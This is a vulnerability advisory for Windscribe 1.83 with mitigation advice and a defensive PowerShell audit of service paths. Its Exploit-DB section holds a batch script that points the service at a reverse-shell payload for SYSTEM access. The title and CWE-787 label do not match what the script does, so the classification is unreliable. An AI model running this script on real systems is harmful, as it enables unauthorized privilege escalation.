Vendor: Windscribe
By: Ethan Seow
CVSS: 7.8 (HIGH)
Unquoted Service Path
CWE: 787
Product Name: Windscribe
Affected Version From: 1.83
Affected Version To: 1.83
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Microsoft Windows 10 Home 10.0.18363 Build 18363
2020

Windscribe 1.83 – ‘WindscribeService’ Unquoted Service Path

This exploit allows an attacker to gain SYSTEM-level privileges by exploiting the unquoted service path vulnerability in Windscribe 1.83. The attacker can use a reverse shell payload to gain access to the system. The exploit code first sets the WindscribeService binPath to the reverse shell payload, then stops and starts the service. The exploit succeeds when the reverse shell is triggered.

Mitigation:

Ensure that all service paths are properly quoted and that all services are running with the least privileges necessary.
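
One way to audit the quoting part of this mitigation, as an added example that is not from the original advisory or the Exploit-DB entry: a PowerShell check that flags service image paths containing a space without surrounding quotes, reports the account each service runs as, and prints the quoted form. The function name, service names and paths are constructed placeholders, not Windscribe's actual values.

```powershell
# Added example, not part of the original advisory.
# Function name and the sample rows below are constructed for illustration.
function Get-UnquotedServicePath {
    param([string]$Name, [string]$StartName, [string]$PathName)

    $p = $PathName.Trim()
    # Empty or already-quoted values are unambiguous; driver-style paths
    # (\SystemRoot\..., \??\...) are loaded by the kernel, not via CreateProcess.
    if ($p -eq '' -or $p.StartsWith('"') -or $p -match '^\\(SystemRoot|\?\?)\\') { return }

    # Split the image from its arguments at the first executable extension.
    $m = [regex]::Match($p, '^(.*?\.(?:exe|com|bat|cmd))(?:\s+(.*))?$', 'IgnoreCase')
    if ($m.Success) { $image = $m.Groups[1].Value; $rest = $m.Groups[2].Value }
    else            { $image = $p;                 $rest = '' }

    # Spaces only matter inside the image path itself, not in the arguments.
    if (-not $image.Contains(' ')) { return }

    [pscustomobject]@{
        Name      = $Name
        RunsAs    = $StartName
        Current   = $p
        Suggested = ('"{0}" {1}' -f $image, $rest).Trim()
    }
}

# Constructed sample rows. On a live host, feed real data instead:
#   $services = Get-CimInstance Win32_Service | Select-Object Name, StartName, PathName
$services = @(
    [pscustomobject]@{ Name = 'ExampleVpnSvc'; StartName = 'LocalSystem'
                       PathName = 'C:\Program Files (x86)\Example VPN\ExampleService.exe' }
    [pscustomobject]@{ Name = 'ExampleQuoted'; StartName = 'LocalSystem'
                       PathName = '"C:\Program Files\Example App\svc.exe" --service' }
    [pscustomobject]@{ Name = 'ExampleHost'; StartName = 'NT AUTHORITY\LocalService'
                       PathName = 'C:\Windows\System32\svchost.exe -k netsvcs' }
    [pscustomobject]@{ Name = 'ExampleUpdater'; StartName = 'LocalSystem'
                       PathName = 'C:\Program Files\Example Updater\upd.exe /svc' }
)

# Only ExampleVpnSvc and ExampleUpdater are reported for these rows.
$services | ForEach-Object {
    Get-UnquotedServicePath -Name $_.Name -StartName $_.StartName -PathName $_.PathName
} | Format-List
```

The RunsAs column covers the least-privilege part of the mitigation: a flagged service running as LocalSystem is the first one to requote or move to a lower-privileged account.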

Exploit-DB raw data:

# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
# Date: 2020-06-26
# Exploit Author: Ethan Seow
# Vendor Homepage: https://windscribe.com
# Version: v1.83 Build 20
# Tested on: Microsoft Windows 10 Home 10.0.18363 Build 18363


#filename : exploit.bat

#Code start
@echo off

sc config WindscribeService binPath="cmd /k {PATH TO REVERSE SHELL e.g. C:\Users\Public\payload.exe}"
sc stop WindscribeService
sc start WindscribeService
echo Exploit success! SYSTEM reverse shell should be triggered :DDDDD
pause

#Code end